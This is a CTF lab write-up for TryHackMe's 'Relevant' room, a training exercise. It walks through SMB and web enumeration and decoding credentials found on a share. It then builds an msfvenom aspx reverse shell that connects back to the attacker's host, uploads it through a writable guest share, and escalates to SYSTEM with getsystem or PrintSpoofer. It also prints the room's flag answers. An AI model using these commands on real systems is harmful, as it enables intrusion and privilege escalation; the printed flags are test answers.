Relevant Writeup - TryHackMe

This is a writeup for the Relevant room, available on TryHackMe.

Today's system vulnerability is based on token impersonation. For this to work, we need a tool that uses a named pipe to trick an NT AUTHORITY\SYSTEM account into connecting and authenticating to an RPC server under the attacker's control, abusing some characteristics of the IStorage COM interface. The RottenPotato and RogueWinRM exploits are widely used for this vulnerability.

Introduction

Room Description

You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.

Notes & Observations

  • Gaining access to the machine: there is a strange nt4wrksv folder that can be found among the SMB shares and on the website as well
  • I described the automated way of gaining root access (Metasploit's getsystem command). Behind the scenes, the tool creates a named pipe server with limited privileges, then configures a Windows service (the client) to connect to the pipe created by the server. If you want to do it manually, then:
    • Create a simple reverse shell (shell_reverse_tcp instead of meterpreter/reverse_tcp)
    • Get PrintSpoofer from GitHub
    • Upload it to the shared SMB folder and locate this folder on the target machine
    • Execute PrintSpoofer.exe -i -c cmd on the target machine
  • It took me a lot of time to enumerate the websites and find the nt4wrksv folder
  • The credentials I found on the SMB didn't help much

Used tools: nmap, smbclient, ffuf, msfvenom, Metasploit, base64, PrintSpoofer.exe

Walkthrough

This chapter contains all the steps necessary to answer the questions in this room.

Enumerate the Website

  1. Run a full nmap scan:

    nmap <IP> -sS -Pn -n -sV -p-

  2. Run a directory search on the website on port 49663 to find the nt4wrksv folder:

    ffuf -u http://<IP>:49663/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100
    
  3. Check the nt4wrksv folder in the browser.

  4. Check whether you can access the passwords.txt file from this folder.

Enumerate SMB

  1. Check the SMB shares with smbclient; when it asks for a password, just hit Enter:

    smbclient -L //<IP>

  2. Check the SMB shares with nmap scripts:

    nmap <IP> -p139,445 --script=smb-enum-users,smb-enum-shares
    

    We have read/write access as the guest user to the nt4wrksv share.

  3. Access the nt4wrksv share and list its content:

    smbclient //<IP>/nt4wrksv
    

  4. Read the content of the passwords.txt file:

    get passwords.txt -
    

  5. Decode the two rows found in passwords.txt with base64 (note that -n is an option of echo, so it goes before the string; placed after it, it becomes part of the echoed text):

    echo -n "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
    Bob - !P@$$W0rD!123
    echo -n "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
    Bill - Juw4nnaM4n420696969!$$$
    
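The decoding step above generalises to any text dump pulled from a share: the following Python script is an added example (not part of the original writeup) that walks every line of a file, keeps only lines that are well-formed base64 and decode to printable text, and skips headers or notes. The sample file contents are constructed here; only the two base64 rows come from the walkthrough.

```python
"""Decode base64-encoded lines from a text dump such as the passwords.txt
found on the nt4wrksv share.

Added example, not part of the original writeup. It handles any number of
lines and silently skips lines that are not valid base64 or that do not
decode to printable text, so it can be pointed at a whole loot file.
"""
import base64
import binascii
import re

# Strict base64 shape: alphabet characters followed by at most two '=' pads.
B64_LINE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_base64_lines(text: str) -> list:
    """Return (original_line, decoded_text) pairs for every line that is
    base64 and decodes to printable UTF-8; other lines are skipped."""
    results = []
    for raw in text.splitlines():
        line = raw.strip()
        # Length must be a multiple of 4 and the alphabet must be clean.
        if not line or len(line) % 4 or not B64_LINE.match(line):
            continue
        try:
            decoded = base64.b64decode(line, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # valid-looking but not real base64 text
        if not decoded.isprintable():
            continue  # binary payload, not a credential line
        results.append((line, decoded))
    return results


# Constructed sample standing in for the share's passwords.txt: a header line
# that is not base64, plus the two encoded rows quoted in the walkthrough.
SAMPLE_PASSWORDS_TXT = """passwords (encoded)
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
"""

if __name__ == "__main__":
    for encoded, plain in decode_base64_lines(SAMPLE_PASSWORDS_TXT):
        print(f"{encoded} -> {plain}")
```

Run it against a downloaded file with `decode_base64_lines(open("passwords.txt").read())`; `validate=True` makes `b64decode` reject stray characters instead of silently dropping them, which is why the regex and the decoder are both used.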

User Flag

Answer: THM{fdk4ka34vk346ksxfr21tg789ktf45}

  1. Create an aspx reverse shell with msfvenom:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=4440 -f aspx > shell.aspx
    
  2. Put it into the nt4wrksv SMB share using the guest user or Bob's credentials:

    smbclient //<IP>/nt4wrksv -U guest
    put shell.aspx

  3. Prepare a multi/handler Meterpreter listener in Metasploit.

  4. Trigger the reverse shell by requesting it in the browser and catch it with the listener:

    http://<IP>:49663/nt4wrksv/shell.aspx
    
  5. Get the user.txt file from C:\users\bob\Desktop\user.txt.

Root Flag

Answer: THM{1fk5kf469devly1gl320zafgl345pv}

  1. Check the account's privileges:

    whoami /priv

    The account holds SeImpersonatePrivilege, which can be abused; with Metasploit you can gain root access automatically. If you want to do it manually, follow the description at the beginning of this writeup.

  2. Use the getsystem command to gain root privileges:

    getsystem

  3. Get the root.txt file from C:\users\Administrator\Desktop\root.txt.
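The whoami /priv check in step 1 is worth automating when auditing service accounts, since the same privilege is what makes an IIS application pool identity a privilege-escalation path. The following Python parser is an added example (not part of the original writeup): it reads the table that whoami /priv prints and lists the token-related privileges the account holds. The sample output is constructed to mirror the command's layout; the privilege names are real Windows privilege constants.

```python
"""Parse `whoami /priv` output and flag privileges that allow a process to
obtain or act under another security context.

Added example, not part of the original writeup. SAMPLE_OUTPUT below is a
constructed copy of the table layout the command prints.
"""

# SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege are the two rights
# abused by named-pipe / potato-style token impersonation; SeDebug and SeTcb
# are listed as related high-impact rights a reviewer should also question.
TOKEN_ABUSE_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege",
    "SeTcbPrivilege",
}

# Constructed sample: the table shape `whoami /priv` prints for a typical
# IIS application pool identity.
SAMPLE_OUTPUT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(output: str) -> dict:
    """Return {privilege_name: state} from the text `whoami /priv` prints.

    The table has a header row, a row of '=' separators, then one row per
    privilege: the name first, a free-text description, and the State as
    the last whitespace-separated column.
    """
    privs = {}
    in_table = False
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("===="):
            in_table = True  # privilege rows start after the separator line
            continue
        if not in_table:
            continue
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith("Se"):
            continue  # not a privilege row
        privs[parts[0]] = parts[-1]
    return privs


def risky_privileges(privs: dict) -> list:
    """Names of token-abuse privileges present in the token, regardless of
    state: a privilege shown as Disabled is still held and can be enabled by
    the process itself, so 'Disabled' is not a mitigation."""
    return sorted(name for name in privs if name in TOKEN_ABUSE_PRIVILEGES)


if __name__ == "__main__":
    held = parse_whoami_priv(SAMPLE_OUTPUT)
    for name in risky_privileges(held):
        print(f"{name}: {held[name]}")
```

Feed it real output with `parse_whoami_priv(subprocess.check_output(["whoami", "/priv"], text=True))` on a Windows host; any account that is not SYSTEM yet lists a privilege from TOKEN_ABUSE_PRIVILEGES deserves the same scrutiny the app pool identity gets in this room.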